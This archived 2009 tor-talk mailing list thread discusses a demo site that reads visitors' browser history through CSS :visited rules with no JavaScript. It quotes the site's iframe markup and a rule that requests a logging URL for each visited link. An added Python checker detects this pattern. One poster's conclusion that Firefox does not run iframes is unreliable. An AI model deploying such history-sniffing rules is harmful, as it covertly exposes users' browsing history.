Stealing browser history without JavaScript

Anon Mus my.green.lantern at googlemail.com
Mon Jun 15 20:40:11 UTC 2009


Zinco wrote:
>>>>> Matej Kovacic wrote:
>>>>>   
>>>>> Hi,
>>>>>
>>>>> this seems an interesting issue:
>>>>>
>>>>> http://www.making-the-web.com/misc/sites-you-visit/nojs/
>>>>>
>>>>> bye, Matej
>>>>
>>>> Anon Mus Wrote:     
>>>> Been to this site and it doesn't work on my firefox.3.0.8 browser... (with
>>>> NoScript, QuickJava, Better Privacy, JavaScript Deobfuscator, Quick
>>>> Preference Button & User Agent Switcher)
>>>>
>>>> it replies with a 0 (zero) count. But there should be dozens.
>>>
>>> Zinco Wrote:
>>> Seems to me it would have to have all websites known to man on the page it
>>> loads.  If it looks at "visited links" css on the page it loads it could
>>> only look at websites on that page.  It would have to store a lot of web
>>> pages on that hidden i-frame to really compare.  Unless you are looking to
>>> see if a particular person visited a particular page doesn't seem like it
>>> would do anyone much good.
>>
>> Anon Mus Wrote:   
>> Maybe IFrames don't work on Firefox. The page's IFrame message "Please
>> enable Iframes, though" is superfluous, as it only prints if IFrames is
>> functional !!
>>
>> Reminds me of a security software con site years ago which would print
>> some detail value known only to your browser, up on a web page. Of
>> course, only YOU could see it, no data was sent to the visited web site.
>>
>> Even though it was a con, lots of people bought the security software
>> to protect themselves from that non-existent leak.
>>
>> In this IFrames exploit the test web page is said to have a css
>> background image embedded in it. I can find no such image (background:
>> #003399;).
>> (See http://www.w3schools.com/css/pr_background.asp.)
>>
>> The only image on the page is a javascript button. But there is a
>> javascript dependent Google Analytics urchin tracker.
>>
>> Would the author Brendon Bo[mb]shell like to identify him/her self?
>>
>
> Zinco Wrote:
>
> 50000 pages isn't very much.  Would have to contain millions it would seem.
> It did work on my browser and found 30 of the most popular sites.  eBay etc.
>
> *************************
> Index.php I-Frame
> <iframe src="start_scan.php?769245844" width="300" height="260"
> frameborder="0" scrolling="no">Please enable Iframes, though</iframe>
>
> <p><!-- AddThis Button BEGIN -->
> <!-- AddThis Button END -->
> <script type="text/javascript">
> digg_skin = 'compact';
> digg_window = 'new';
> </script>
> <script src="http://digg.com/tools/diggthis.js"
> type="text/javascript"></script> 
> <script type="text/javascript"
> src="http://www.reddit.com/button.js?t=1"></script>
> </p>
> *******************************
> Start_scan.php I-frame
> <iframe src="sites_list.php?sess=fe728e" width="288" height="210"
> frameborder="0"></iframe>
>
> </div>
>
> <iframe src="base.php?sess=fe728e" width="1" height="1"
> frameborder="0"></iframe>
> **********************************
> Base.php
> <style type="text/css">#l2001
> a:visited{background:url(log_base.php?id=2001&sess=fe728e);}
> ***************************
>
So there is the IFrame provisioned background image.

As I couldn't see this "base.php" code, it pretty much confirms
that Firefox doesn't run IFrames.

Obviously the,

"

<p><!-- AddThis Button BEGIN -->
<!-- AddThis Button END -->
<script type="text/javascript">
digg_skin = 'compact';
digg_window = 'new';
</script>
<script src="http://digg.com/tools/diggthis.js"
type="text/javascript"></script> 
<script type="text/javascript"
src="http://www.reddit.com/button.js?t=1"></script>
</p>

"
section will only run as javascript.. so "NoScript" takes care of that.
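
As a defensive illustration of the Base.php rule quoted in this thread (an added example, not part of the original posts or of the site's code): a small Python check that flags stylesheet rules where a `:visited` selector carries a `url()` value, the pattern that makes the browser request `log_base.php` only for links it considers visited. The function name and the sample stylesheet are constructed for this example.

```python
import re

# Constructed sample modelled on the Base.php rule quoted above; the second
# and third rules are benign controls that must not be reported.
SAMPLE_CSS = """
#l2001 a:visited{background:url(log_base.php?id=2001&sess=fe728e);}
a:visited { color: #609; }
.banner { background: url(banner.png); }
#l2002 a:visited, #l2002 a:hover { list-style-image: url("log_base.php?id=2002") }
"""

COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Innermost "selector { declarations }" pairs, so rules nested in @media match too.
RULE = re.compile(r"([^{}]+)\{([^{}]*)\}")
# "property: value", treating url(...) as one unit so a ';' inside a URL
# does not end the declaration early.
DECL = re.compile(r"([\w-]+)\s*:\s*((?:url\([^)]*\)|[^;])*)", re.I)
URL = re.compile(r"url\(\s*(['\"]?)(.*?)\1\s*\)", re.I)


def find_visited_fetches(css):
    """Return (selector, property, url) for each declaration that would make
    the browser fetch a resource only when a link matches :visited.

    Limitation: a ')' inside a quoted URL is not handled.
    """
    findings = []
    css = COMMENT.sub("", css)
    for selectors, body in RULE.findall(css):
        # Only the comma-separated selectors that actually test :visited matter.
        visited = [s.strip() for s in selectors.split(",")
                   if ":visited" in s.lower()]
        if not visited:
            continue
        for prop, value in DECL.findall(body):
            for _quote, url in URL.findall(value):
                for sel in visited:
                    findings.append((sel, prop.lower(), url))
    return findings


if __name__ == "__main__":
    for selector, prop, url in find_visited_fetches(SAMPLE_CSS):
        print(f"{selector}: {prop} would fetch {url}")
```

Current browsers ignore `url()` values in `:visited` rules, so a hit from this check indicates a page written to probe history rather than a leak that still works.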




More information about the tor-talk mailing list